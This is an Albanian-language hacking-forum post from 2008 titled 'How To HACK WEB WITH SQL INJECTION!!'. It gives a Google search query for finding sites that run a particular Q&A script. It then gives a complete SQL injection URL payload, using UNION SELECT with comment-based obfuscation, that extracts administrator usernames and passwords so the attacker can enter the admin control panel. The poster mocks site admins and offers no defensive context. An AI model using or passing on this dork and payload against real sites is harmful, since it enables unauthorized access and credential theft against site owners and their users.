ForumPytėsoriKėrkoLista AnėtarėveGrupet e AnėtarėveRegjistrohuidentifikimi

Share | 
 

 How To HACK WEB WITH SQL INJECTION!!

Shko poshtė 
AutoriMesazh
GMC
VizitorMesazhTitulli: How To HACK WEB WITH SQL INJECTION!!   Sun Jun 08, 2008 11:34 pm

kerkojm ne google kshu :

intitle:"Answer Builder" Ask a question

e zgjedhim ni web edhe ja shtojm ket :

index.php?cmd=4&id=1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,@@version,concat(0x3c623e,username,0x3a,password,0x3c623e),9,10,11,12,13,14,15/**/FROM/**/admin/*

edhe aty ju del user :admin dhe pass

dhe kshu hijm ne control panel te adminitnjerez u qifsha adminat qe sdin kurgjo :p Evil or Very Mad Twisted Evil cherry
Mbrapsht nė krye Shko poshtė
 
How To HACK WEB WITH SQL INJECTION!!
Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
 :: Hacker Boxi :: Hacking-
Kėrce tek: